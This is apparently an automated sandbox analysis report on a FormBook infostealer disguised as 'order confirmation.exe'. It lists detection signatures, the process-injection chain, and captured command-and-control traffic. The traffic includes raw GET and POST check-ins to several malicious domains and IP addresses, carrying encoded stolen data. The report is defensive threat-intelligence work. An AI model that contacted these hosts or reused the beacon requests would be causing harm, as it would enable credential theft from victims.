
Windows Analysis Report
order confirmation.exe

Overview

General Information

Sample name: order confirmation.exe
Analysis ID: 1575107
MD5: 8d4459233467bbcf973541c6b17091d7
SHA1: e1a6e0be6aa2e7aa77c9f5f3c394d62c749c2b06
SHA256: 1bd11bb8886ef9aaaa8a59425f2fce8517a476dcb328751f8c39512cf719f2da
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • order confirmation.exe (PID: 2300 cmdline: "C:\Users\user\Desktop\order confirmation.exe" MD5: 8D4459233467BBCF973541C6B17091D7)
    • order confirmation.exe (PID: 1384 cmdline: "C:\Users\user\Desktop\order confirmation.exe" MD5: 8D4459233467BBCF973541C6B17091D7)
    • order confirmation.exe (PID: 3120 cmdline: "C:\Users\user\Desktop\order confirmation.exe" MD5: 8D4459233467BBCF973541C6B17091D7)
      • XDBtzWJieMe.exe (PID: 2068 cmdline: "C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchProtocolHost.exe (PID: 2508 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)
          • XDBtzWJieMe.exe (PID: 2648 cmdline: "C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1308 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
4.2.order confirmation.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.order confirmation.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T13:50:26.831562+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 27.124.4.246 | 80 | TCP
2024-12-14T13:50:53.267883+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49761 | 156.232.181.155 | 80 | TCP
2024-12-14T13:51:08.315517+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49800 | 185.27.134.206 | 80 | TCP
2024-12-14T13:51:23.825390+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49836 | 88.99.61.52 | 80 | TCP
2024-12-14T13:51:39.039809+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49877 | 104.21.90.137 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T13:50:45.112946+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49743 | 156.232.181.155 | 80 | TCP
2024-12-14T13:50:47.769352+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49749 | 156.232.181.155 | 80 | TCP
2024-12-14T13:50:50.425470+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49755 | 156.232.181.155 | 80 | TCP
2024-12-14T13:51:00.169850+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49777 | 185.27.134.206 | 80 | TCP
2024-12-14T13:51:02.982857+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49785 | 185.27.134.206 | 80 | TCP
2024-12-14T13:51:05.643181+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49794 | 185.27.134.206 | 80 | TCP
2024-12-14T13:51:15.940564+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49815 | 88.99.61.52 | 80 | TCP
2024-12-14T13:51:18.496919+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49821 | 88.99.61.52 | 80 | TCP
2024-12-14T13:51:21.155464+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49829 | 88.99.61.52 | 80 | TCP
2024-12-14T13:51:30.429742+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49854 | 104.21.90.137 | 80 | TCP
2024-12-14T13:51:33.099346+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49860 | 104.21.90.137 | 80 | TCP
2024-12-14T13:51:35.775082+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49866 | 104.21.90.137 | 80 | TCP


                AV Detection

Source: http://www.5tuohbpzyj9.buzz/abgi/ | Avira URL Cloud: Label: malware
Source: http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5 | Avira URL Cloud: Label: malware
Source: http://www.5tuohbpzyj9.buzz/abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEp | Avira URL Cloud: Label: malware
Source: http://www.canadavinreport.site/4d2l/ | Avira URL Cloud: Label: malware
Source: http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w== | Avira URL Cloud: Label: malware
Source: order confirmation.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: 4.2.order confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.order confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2823935651.0000000004EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1983228417.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2821333990.0000000003270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2821409903.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1982675271.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2818601747.00000000009E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2820915719.0000000002B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1984356146.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: order confirmation.exe | Joe Sandbox ML: detected
Source: order confirmation.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: order confirmation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XDBtzWJieMe.exe, 00000008.00000002.2819410529.0000000000EBE000.00000002.00000001.01000000.0000000C.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2820406568.0000000000EBE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: order confirmation.exe, 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1991485419.000000000332E000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1983337784.0000000003179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: order confirmation.exe, order confirmation.exe, 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1991485419.000000000332E000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1983337784.0000000003179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: XDBtzWJieMe.exe, 00000008.00000003.1919507373.0000000000FFB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: XDBtzWJieMe.exe, 00000008.00000003.1919507373.0000000000FFB000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 9_2_009FC860 FindFirstFileW,FindNextFileW,FindClose,9_2_009FC860
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 4x nop then xor eax, eax 9_2_009E9EA0
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Code function: 4x nop then mov ebx, 00000004h 9_2_033C04E8

                Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49715 -> 27.124.4.246:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49749 -> 156.232.181.155:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49800 -> 185.27.134.206:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49785 -> 185.27.134.206:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49794 -> 185.27.134.206:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49815 -> 88.99.61.52:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49836 -> 88.99.61.52:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 156.232.181.155:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49761 -> 156.232.181.155:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49821 -> 88.99.61.52:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49777 -> 185.27.134.206:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49854 -> 104.21.90.137:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49860 -> 104.21.90.137:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49829 -> 88.99.61.52:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49866 -> 104.21.90.137:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49877 -> 104.21.90.137:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49755 -> 156.232.181.155:80
Source: Joe Sandbox View | IP Address: 27.124.4.246 27.124.4.246
Source: Joe Sandbox View | IP Address: 156.232.181.155 156.232.181.155
Source: Joe Sandbox View | IP Address: 185.27.134.206 185.27.134.206
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /8s5b/?KX=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYqRwUDZc0hQ5nlduAuRdjiHqVHSyH0yZGbg1OgG3wMBkWQ==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1 Host: www.laohub10.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Source: global traffic | HTTP traffic detected: GET /abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1 Host: www.5tuohbpzyj9.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Source: global traffic | HTTP traffic detected: GET /4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w== HTTP/1.1 Host: www.canadavinreport.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Source: global traffic | HTTP traffic detected: GET /ogj2/?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1 Host: www.phoenix88.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Source: global traffic | HTTP traffic detected: GET /eaqq/?KX=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYqX2P65hLvXSZ3fWNCCIV/k5d2IdbBS66sOXN5gLen/wBg==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1 Host: www.ana-silverco.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Source: global traffic | DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic | DNS traffic detected: DNS query: www.5tuohbpzyj9.buzz
Source: global traffic | DNS traffic detected: DNS query: www.canadavinreport.site
Source: global traffic | DNS traffic detected: DNS query: www.phoenix88.sbs
Source: global traffic | DNS traffic detected: DNS query: www.ana-silverco.shop
Source: unknown | HTTP traffic detected: POST /abgi/ HTTP/1.1 Host: www.5tuohbpzyj9.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Origin: http://www.5tuohbpzyj9.buzz Content-Length: 203 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.5tuohbpzyj9.buzz/abgi/ User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+ Data Raw: 4b 58 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 61 4d 6c 59 75 6d 48 52 4e 77 34 34 75 5a 46 4e 69 32 61 53 58 66 52 6a 35 35 36 6c 2f 4d 46 30 54 31 4a 4a 7a 41 70 32 75 4a 54 48 55 61 59 42 6e 79 51 57 46 4c 66 45 4c 56 59 79 52 42 4f 53 4d 47 51 79 78 4b 6b 4e 2b 4b 61 6f 55 6c 39 48 56 62 71 6d 4e 4a 50 45 31 47 6f 66 59 48 69 33 73 44 73 72 43 50 34 56 6d 65 79 47 42 43 49 64 64 75 50 56 42 5a 38 79 77 61 63 6e 4f 35 59 48 75 72 50 38 4d 67 77 58 74 33 34 37 47 63 67 30 6e 53 2b 63 72 55 59 33 67 35 2b 44 46 75 4b 4b 58 62 6e 31 35 47 38 49 51 4a 48 5a 4b 37 61 62 46 6a 2f 68 43 68 67 71 6d 6f 3d Data Ascii: KX=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+crUY3g5+DFuKKXbn15G8IQJHZK7abFj/hChgqmo=
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Sat, 14 Dec 2024 12:50:52 GMT Content-Type: text/html Content-Length: 566 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 14 Dec 2024 12:51:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yK8E%2B8UBoJRuCE4OSXsnnXc3Ych%2Fhv2j0OlMsLkw3cvTGlAbOmraMdY7C%2BaL8FJE5zkYyCItsvnMjLqT34%2B7QP0maBRCqbCFYYV2cBzNwZJmms%2FVTfuNAp0rowzvARfAwSqq8vqDY1Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e5361c80043c2-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1678&rtt_var=839&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 14 Dec 2024 12:51:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KfRJUbqGH0yvBdTV9ZcLlgsOh3ochM2JEFIPFVa2BBbnuKUaaxJWYuc4jGWuSucqHv35cCu3NSx52XfBbxdz7p7d5dQ2ghy48LpPv9ibygaW3XWJ9%2FAaOvYpnThrgozxWPwOr%2B3dbiI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e53727bec435e-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=808&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 14 Dec 2024 12:51:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8d%2BxpHOsorakXoxc6p6pSeCntTTnPXUKwqtys3ACiUgOHSL7yfLWEFfSuxnqKihgQqY8GOBESJ9CuBXQbVLV6NbYw4IUrRXq%2BeejTNbcZh3LVLFNy8csV%2BuntGpBZzE%2BM2wO7HJr4oI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e53833d127293-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2099&min_rtt=2099&rtt_var=1049&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1825&delivery_rate=0&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 14 Dec 2024 12:51:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.33 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1FD134R3%2BCEJSevsZ9VEl5FVBIJrcxP%2FnXm3fRXbhgEAMfmmIezQ905Z1AJE%2FQOiSxybGgBVulvi1GkOX%2B1Ls16yVmupTVi3t915VSiLhSsYDizOdv9CsXN7X2rXCDfRfm6CgSm0m40%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f1e5397aa5841af-EWR alt-svc: h3=":443"; ma=86400 server-timing: 